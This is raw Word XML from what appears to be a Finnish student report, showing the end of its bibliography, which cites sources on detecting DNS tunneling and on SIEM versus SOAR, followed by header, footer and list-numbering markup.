        <w:r w:rsidRPr="261F289F" w:rsidR="1B7731AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.zenarmor.com/docs/network-security-tutorials/what-is-dns-tunneling#how-can-organizations-detect-dns-tunneling-attacks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="261F289F" w:rsidP="261F289F" w:rsidRDefault="261F289F" w14:paraId="0A89ACD3" w14:textId="126AA7CB">
      <w:pPr>
        <w:pStyle w:val="Lhdeluettelo"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A96998" w:rsidR="53AE08E2" w:rsidP="07276E59" w:rsidRDefault="3CD06660" w14:paraId="2FA6A696" w14:textId="48233FE5">
      <w:pPr>
        <w:pStyle w:val="Lhdeluettelo"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlinkki"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="3CD06660">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sidd</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="5574B0D5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="3CD06660">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qui, L</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="5574B0D5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="53AE08E2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM vs SOAR: What’s The Difference? </w:t>
      </w:r>
      <w:r w:rsidR="5667AE5E">
        <w:rPr/>
        <w:t xml:space="preserve">Splunk.com -verkkosivusto. 9/2023. Viitattu 22.11.2024. </w:t>
      </w:r>
      <w:hyperlink r:id="R07001dee1f2842f1">
        <w:r w:rsidRPr="261F289F" w:rsidR="659EC92D">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>https://www.splunk.com/en_us/blog/learn/siem-vs-soar.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="261F289F" w:rsidP="261F289F" w:rsidRDefault="261F289F" w14:paraId="48A51041" w14:textId="6D3EF419">
      <w:pPr>
        <w:pStyle w:val="Lhdeluettelo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A96998" w:rsidR="00725AC4" w:rsidP="00725AC4" w:rsidRDefault="00725AC4" w14:paraId="49E33505" w14:textId="21A851D5">
      <w:pPr>
        <w:pStyle w:val="Lhdeluettelo"/>
        <w:sectPr w:rsidRPr="00A96998" w:rsidR="00725AC4" w:rsidSect="001A0CE3">
          <w:headerReference w:type="even" r:id="rId59"/>
          <w:headerReference w:type="default" r:id="rId60"/>
          <w:footerReference w:type="default" r:id="rId61"/>
          <w:headerReference w:type="first" r:id="rId62"/>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait" w:code="9"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB2429" w:rsidRDefault="00AB2429" w14:paraId="66AB3D8E" w14:textId="77777777"/>
    <w:sectPr w:rsidR="00AB2429" w:rsidSect="0058148B">
      <w:headerReference w:type="even" r:id="rId63"/>
      <w:headerReference w:type="default" r:id="rId64"/>
      <w:headerReference w:type="first" r:id="rId65"/>
      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"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8263C" w:rsidP="00520772" w:rsidRDefault="00A8263C" w14:paraId="65A31365" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8263C" w:rsidRDefault="00A8263C" w14:paraId="3C2BF6A3" w14:textId="77777777"/>
    <w:p w:rsidR="00A8263C" w:rsidRDefault="00A8263C" w14:paraId="7DA1A919" w14:textId="77777777"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A8263C" w:rsidP="00520772" w:rsidRDefault="00A8263C" w14:paraId="7EE6D0F5" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8263C" w:rsidRDefault="00A8263C" w14:paraId="77EB4FD2" w14:textId="77777777"/>
    <w:p w:rsidR="00A8263C" w:rsidRDefault="00A8263C" w14:paraId="19621F35" w14:textId="77777777"/>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="00A8263C" w:rsidRDefault="00A8263C" w14:paraId="01EDC29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mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
  <w:p w:rsidR="00A67A4F" w:rsidRDefault="00A67A4F" w14:paraId="09C1E8CD" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Alatunniste"/>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00A67A4F" w:rsidRDefault="00A67A4F" w14:paraId="6F0CB55F" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Alatunniste"/>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00A67A4F" w:rsidRDefault="00A67A4F" w14:paraId="5596E07E" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Alatunniste"/>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00A67A4F" w:rsidRDefault="00A67A4F" w14:paraId="182F19AB" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Alatunniste"/>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00A67A4F" w:rsidP="008E1D38" w:rsidRDefault="00A67A4F" w14:paraId="61F86B11" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Alatunniste"/>
      <w:ind w:left="1134"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="392222A9" wp14:editId="6D988D4D">
          <wp:extent cx="3160800" cy="403011"/>
          <wp:effectExtent l="0" t="0" r="1905" b="0"/>
          <wp:docPr id="10" name="Kuva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va 10">
                    <a:extLst>
                      <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                        <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
                      </a:ext>
                    </a:extLst>
                  </pic:cNvPr>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1">
                    <a:extLst>
                      <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                        <adec:decorative xmlns:arto="http://schemas.microsoft.com/office/word/2006/arto" xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns="" val="1"/>
                      </a:ext>
                    </a:extLst>
                  </a:blip>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="3160800" cy="403011"/>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701321" w:rsidR="00A67A4F" w:rsidP="00701321" w:rsidRDefault="00A67A4F" w14:paraId="061D436C" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Alatunniste"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="006B363C" w:rsidRDefault="006B363C" w14:paraId="4C01675A"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8263C" w:rsidP="00520772" w:rsidRDefault="00A8263C" w14:paraId="78C39C8F" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8263C" w:rsidRDefault="00A8263C" w14:paraId="035A2492" w14:textId="77777777"/>
    <w:p w:rsidR="00A8263C" w:rsidRDefault="00A8263C" w14:paraId="3439AA04" w14:textId="77777777"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A8263C" w:rsidP="00520772" w:rsidRDefault="00A8263C" w14:paraId="547F9654" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8263C" w:rsidRDefault="00A8263C" w14:paraId="3DB6EA3C" w14:textId="77777777"/>
    <w:p w:rsidR="00A8263C" w:rsidRDefault="00A8263C" w14:paraId="2D44D1D8" w14:textId="77777777"/>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="00A8263C" w:rsidRDefault="00A8263C" w14:paraId="7892C03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A67A4F" w:rsidP="00520772" w:rsidRDefault="00A67A4F" w14:paraId="733C470A" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Yltunniste"/>
      <w:ind w:left="1276"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="fi-FI"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BB53055" wp14:editId="210C10E9">
          <wp:extent cx="2088000" cy="1044111"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="7" name="Kuva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uva 1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88000" cy="1044111"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="fi-FI"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66F18100" wp14:editId="59EECC58">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>1270</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="342900" cy="9258300"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="3" name="Suorakulmi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D004C"/>
                      </a:solidFill>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>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xmlns:arto="http://schemas.microsoft.com/office/word/2006/arto">
          <w:pict>
            <v:rect id="Suorakulmio 4" style="position:absolute;margin-left:0;margin-top:.1pt;width:27pt;height:7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lt="&quot;&quot;" o:spid="_x0000_s1026" fillcolor="#0d004c" stroked="f" w14:anchorId="60496C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E7BF8" w:rsidRDefault="00BE7BF8" w14:paraId="65524865" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Yltunniste"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="006B363C" w:rsidRDefault="006B363C" w14:paraId="7517D36A"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0765798"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w:rsidR="000860CA" w:rsidRDefault="000860CA" w14:paraId="209305C9" w14:textId="77777777">
        <w:pPr>
          <w:pStyle w:val="Yltunniste"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00BE7BF8" w:rsidRDefault="00BE7BF8" w14:paraId="4351C690" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Yltunniste"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="006B363C" w:rsidRDefault="006B363C" w14:paraId="57629FDD" w14:textId="7777777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67A4F" w:rsidP="00A764D6" w:rsidRDefault="00000000" w14:paraId="242C9B13" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Yltunniste"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1375190810"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:r w:rsidR="00A67A4F">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A67A4F">
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r w:rsidR="00A67A4F">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A67A4F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00A67A4F">
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:sdtContent>
    </w:sdt>
  </w:p>
  <w:p w:rsidR="006B363C" w:rsidRDefault="006B363C" w14:paraId="082F5E39" w14:textId="7777777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E7BF8" w:rsidRDefault="00BE7BF8" w14:paraId="3A8D77EF" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Yltunnis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561557"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w:rsidR="000860CA" w:rsidRDefault="000860CA" w14:paraId="6850D8AD" w14:textId="77777777">
        <w:pPr>
          <w:pStyle w:val="Yltunniste"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00BE7BF8" w:rsidRDefault="00BE7BF8" w14:paraId="0095602F" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Yltunnis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67A4F" w:rsidP="00A764D6" w:rsidRDefault="00A67A4F" w14:paraId="3C8D9A31" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Yltunniste"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:sdt>
    <w:sdtPr>
      <w:id w:val="2077011834"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w:rsidR="00A67A4F" w:rsidP="00A764D6" w:rsidRDefault="00A67A4F" w14:paraId="1F610B37" w14:textId="77777777">
        <w:pPr>
          <w:pStyle w:val="Yltunniste"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00A67A4F" w:rsidRDefault="00A67A4F" w14:paraId="68F80668" w14:textId="77777777"/>
  <w:p w:rsidR="00A67A4F" w:rsidRDefault="00A67A4F" w14:paraId="0E1AC449"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9">
    <w:nsid w:val="6b6dd2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59e346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528089a"/>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be897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1bbe54c9"/>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6f299e92"/>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2f2b68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4514f41"/>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b374e5b"/>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7969c2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5dbf7f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7debed62"/>
    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="Ø"/>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375890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79d5a5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7C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CB700C4A"/>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F384D862"/>
    <w:lvl w:ilvl="0" w:tplc="CDDE3AC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Numeroituluettelo4"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1209"/>
        </w:tabs>
        <w:ind w:left="1209" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BB1EDD20">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A7107B4E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C6FC4584">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6482470E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5948AD16">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9E22FE82">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5B869EC4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4B8CD150">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF7E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC68BEC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F5706160"/>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AEDE1014"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1492"/>
        </w:tabs>
        <w:ind w:left="1492" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"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hybridMultilevel"/>
    <w:tmpl w:val="5A1A06A0"/>
    <w:lvl w:ilvl="0" w:tplc="87B83FC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Merkittyluettelo4"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1209"/>
        </w:tabs>
        <w:ind w:left="1209" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="37AAC574">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A4C6B314">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BCFC826A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="90BE5926">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="92F8DFC6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5A48FEA4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5ED6A95E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="06C64FC0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF82"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7806F3FC"/>
    <w:lvl w:ilvl="0" w:tplc="EECEE77A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="926"/>
        </w:tabs>
        <w:ind w:left="926" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D576CD9C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7166C0C8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3CBE9274">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CE9003AA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0E7E3DC0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="49A6CD74">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5954744A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CBA072E4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF83"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75DC11AC"/>
    <w:lvl w:ilvl="0" w:tplc="36966ABE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="643"/>
        </w:tabs>
        <w:ind w:left="643" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="921A628C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="017C5D12">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E76A5AC0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CE3415F8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="425E6E68">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1E7247BC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7BAE57E8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F4748E5C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F1858C6"/>
    <w:lvl w:ilvl="0" w:tplc="EC18F2B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="67E29F0E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="72D01CB2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4C84BC98">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B8148020">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DF5EA47C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C226C3E0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="18F00BC8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="55AC32D0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B224620"/>
    <w:lvl w:ilvl="0" w:tplc="DEF01E98">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Merkittyluettelo"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1F86A216">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
